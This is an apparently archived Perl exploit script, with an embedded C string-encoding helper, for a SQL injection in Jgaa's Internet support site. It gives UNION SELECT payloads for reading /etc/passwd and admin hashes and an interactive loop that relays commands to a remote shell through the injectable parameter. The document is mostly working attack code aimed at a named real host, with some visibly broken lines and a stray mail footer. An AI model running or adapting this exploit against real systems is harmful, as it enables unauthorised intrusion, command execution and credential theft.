#!/usr/bin/perl #You can get admin hash,or acces the pass file from the *NIx #with the generated strings with the generator.c program #you have to put in sql specific comands,my example is for #tables and *NIX pass #exploit tested on winxp sp2 # #include<stdio.h> # #include<stdlib.h> # #include<string.h> # int main() # { char st[1024]; # int le; # printf("Input : "); # gets(st); # for(le=0;le<strlen(st);le++) # { printf("%d,",st[le]); # } # system("pause"); # return 0; # } #101,116,99,47,112,97,115,115,119,100 = /etc/passwd #If we would do this : #http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/* #we create 8 tables ,to see the result type : #-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/* print "......Start.......\n"; print ".................\n"; print ". fl0 fl0w .\n"; print ". found by fl0w fl0w\n"; print ". c0ded by fl0 fl0w\n"; print ".......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com\n\n"; print ".................\n\n"; use LWP::UserAgent; $site=@ARGV[0]; $shells=@ARGV[1]; $shellcmd=@ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shells) { routine() } header(); while() { print"[shell] \$"; while(<STDIN>) { $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n"; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[\n]/[ê]/; if(!$cmd) { print "Enter a command\n\n"; $i=""; } elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ ) { print "\nCould NOT connect to cmd from host \n"; exit; } elsif($i=~/^<br.\/>.<b>WARNING/) { print "\nInvalid command\n\n"; }; if($i=~/(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/) { $last=$1; $last=~tr/[&234;]/[\n]/; print "\n$last\n"; last; } else { print "[shell] \$"; } } } last; sub header() { print q { ================================================================================================================================================================ MSQL injection -file disclosure in Jgaa's Internet PoC:http://support.jgaa.com Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/* ================================================================================================================================================================ } } sub routine() { header(); print q { ====================================================================================================== USAGE: perl exploit.pl <http://site.com> EXAMPLE: perl [localhost\][path] exploit.pl [target] ====================================================================================================== }; exit(); } --------------------------------- Yahoo! oneSearch: Finally, mobile search that gives answers, not web links.